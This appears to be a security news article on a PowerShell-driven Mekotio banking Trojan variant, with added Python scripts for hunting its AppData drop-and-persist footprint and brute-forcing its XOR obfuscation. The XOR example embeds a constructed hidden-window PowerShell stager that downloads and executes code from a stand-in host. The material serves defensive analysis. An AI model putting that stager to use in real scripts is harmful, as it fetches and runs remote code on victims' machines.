PowerShell-Powered Mekotio Trojan Wreaks Havoc Worldwide
CYFIRMA has analyzed a new variant of the Mekotio Trojan, a banking Trojan that is actively spreading among users worldwide. This variant uses a PowerShell script to infiltrate Windows computers and steal confidential information.
According to the research, Mekotio hides its activity behind a heavily obfuscated PowerShell script. On execution it first fingerprints the infected system (country, computer name, username, Windows version and which antivirus product is installed), then establishes a persistent connection to a remote command-and-control (C2) server and retrieves additional malicious files.
The downloaded files are unpacked and installed under the user's APPDATA folder and configured to run automatically at every system startup. They include both executables (.exe) and AutoHotkey scripts (.ahk) used in later stages of the attack.
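The drop-and-persist pattern described above leaves a footprint that defenders can hunt for: a PowerShell process writing .exe or .ahk files under AppData, and an autostart entry pointing at them. The script below is an added illustration, not CYFIRMA's detection logic or anything from the Mekotio sample. The log lines are constructed to resemble Sysmon events (Event ID 11 file creation, Event ID 13 registry value set), and the use of a Run key as the autostart mechanism is an assumption, since the article only says the files execute at each startup.

```python
"""Hunt for a PowerShell dropper that stages .exe/.ahk payloads under
%APPDATA% and registers them for autostart.  Added example; the events
below are constructed, not real telemetry, and the Run-key mechanism
is assumed rather than taken from the article."""
import re

# Sysmon-style "key=value" fields; values may contain spaces, so a
# value runs until the next " key=" token or the end of the line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")
APPDATA_RE = re.compile(r"\\AppData\\(Roaming|Local)\\", re.I)
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
PAYLOAD_EXT = (".exe", ".ahk")

# Constructed sample events (not from any real host).
SAMPLE_EVENTS = [
    "EventID=11 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "TargetFilename=C:\\Users\\alice\\AppData\\Roaming\\update\\svc.ahk",
    "EventID=11 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "TargetFilename=C:\\Users\\alice\\AppData\\Roaming\\update\\svc.exe",
    "EventID=13 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "TargetObject=HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\update "
    "Details=C:\\Users\\alice\\AppData\\Roaming\\update\\svc.exe",
    # Benign: a vendor installer registering a Run key under Program Files.
    "EventID=13 Image=C:\\Program Files\\Vendor\\setup.exe "
    "TargetObject=HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Vendor "
    "Details=C:\\Program Files\\Vendor\\agent.exe",
    # Benign: a document written by Explorer.
    "EventID=11 Image=C:\\Windows\\explorer.exe "
    "TargetFilename=C:\\Users\\alice\\Documents\\notes.txt",
]


def parse_event(line):
    """Split one Sysmon-style line into a dict of fields."""
    return {key: value for key, value in FIELD_RE.findall(line)}


def is_payload_in_appdata(path):
    """True for an .exe or .ahk file located under AppData\\Roaming or AppData\\Local."""
    return bool(APPDATA_RE.search(path)) and path.lower().endswith(PAYLOAD_EXT)


def hunt(lines):
    """Return (rule_name, path) findings for the dropper/persistence pattern."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        eid = ev.get("EventID")
        image = ev.get("Image", "").lower()
        if (eid == "11" and image.endswith("powershell.exe")
                and is_payload_in_appdata(ev.get("TargetFilename", ""))):
            findings.append(("powershell_drops_payload_in_appdata", ev["TargetFilename"]))
        elif (eid == "13" and RUN_KEY_RE.search(ev.get("TargetObject", ""))
                and is_payload_in_appdata(ev.get("Details", ""))):
            findings.append(("run_key_points_to_appdata_payload", ev["Details"]))
    return findings


if __name__ == "__main__":
    for rule, path in hunt(SAMPLE_EVENTS):
        print(f"{rule}: {path}")
```

Run on the constructed events, the two PowerShell file writes and the Run key pointing into AppData are flagged, while the vendor installer's Run key and the document write are not. On a real estate the same two rules translate directly into SIEM queries; the Startup folder and scheduled tasks would need their own rules, since the article does not say which autostart mechanism the sample uses.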
Experts report that the IP address of the C2 server Mekotio contacts is hosted by GoDaddy and geolocates to the United States. Comments in the Trojan's code are written in Portuguese, which points to Brazilian or Portuguese-speaking operators.
“Mekotio Trojan is yet another example of how attackers are leveraging advanced technologies to steal data,” said the head of CYFIRMA’s research department. “The use of powerful obfuscation methods and the ensuring of persistent execution make it extremely difficult to detect and remove. All users must enhance their digital hygiene practices and implement robust solutions to protect against such threats.”
CYFIRMA experts note that Mekotio layers several encoding and obfuscation techniques to complicate detection. In addition to a custom XOR decryption routine, the attackers randomize function and variable names, which makes static analysis of the code laborious and slow.
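Single-byte and short repeating XOR keys are a common first obfuscation layer in PowerShell loaders, and they fall to brute force because the analyst knows roughly what the plaintext should look like. The following script is an added illustration of that recovery step; it is not Mekotio's actual decryption routine, and the key length, the keyword and the sample ciphertext are all constructed for the example.

```python
"""Recover a PowerShell stager hidden behind a single-byte XOR key.
Added example: the key, plaintext and scoring heuristic are constructed
and are not taken from the Mekotio sample."""
import string

# Constructed plaintext of a generic download-and-execute stager.
SAMPLE_PLAINTEXT = (b"powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    b".DownloadString('http://example.invalid/stage2')\"")
SAMPLE_KEY = 0x5A

PRINTABLE = set(string.printable.encode())


def xor_bytes(data, key):
    """XOR data with a repeating key of any length (single byte is the
    common case, but the same routine handles multi-byte keys)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def printable_score(data):
    """Fraction of bytes that are printable ASCII or common whitespace."""
    if not data:
        return 0.0
    return sum(b in PRINTABLE for b in data) / len(data)


def recover_single_byte_key(blob, must_contain=b"powershell"):
    """Try all 256 keys and return (key, plaintext) for the candidate
    whose output is the most printable and contains the expected keyword.
    The keyword bonus breaks ties that pure printability cannot."""
    best = None
    for k in range(256):
        plain = xor_bytes(blob, bytes([k]))
        score = printable_score(plain)
        if must_contain in plain:
            score += 1.0
        if best is None or score > best[0]:
            best = (score, k, plain)
    return best[1], best[2]


# The blob an analyst would be handed: the constructed stager under the
# constructed key.  Built here so the example is self-contained.
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, bytes([SAMPLE_KEY]))


if __name__ == "__main__":
    key, plain = recover_single_byte_key(SAMPLE_BLOB)
    print(f"key=0x{key:02x}")
    print(plain.decode())
```

Against the constructed blob the search returns key 0x5A and the original stager. Real samples often chain this with Base64, character-code arrays or string reversal, so the same scoring loop is usually run once per layer; when the key is longer than one byte, a practitioner would first estimate the key length (for example by looking for repeating byte distances) and then solve each position of the key independently with the same scoring.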
The research also indicates that Mekotio enumerates the antivirus software installed on the infected system; this information is most likely used to choose evasion tactics.
Despite Mekotio's complexity, CYFIRMA specialists have developed a YARA rule that identifies the Trojan by its distinctive characteristics, which analysts and security products can use to detect and block it.
CYFIRMA recommends keeping endpoint protection and operating systems up to date, exercising caution when opening unexpected files and attachments, and maintaining backups of important data. Only a layered approach to cybersecurity can protect against emerging threats like Mekotio.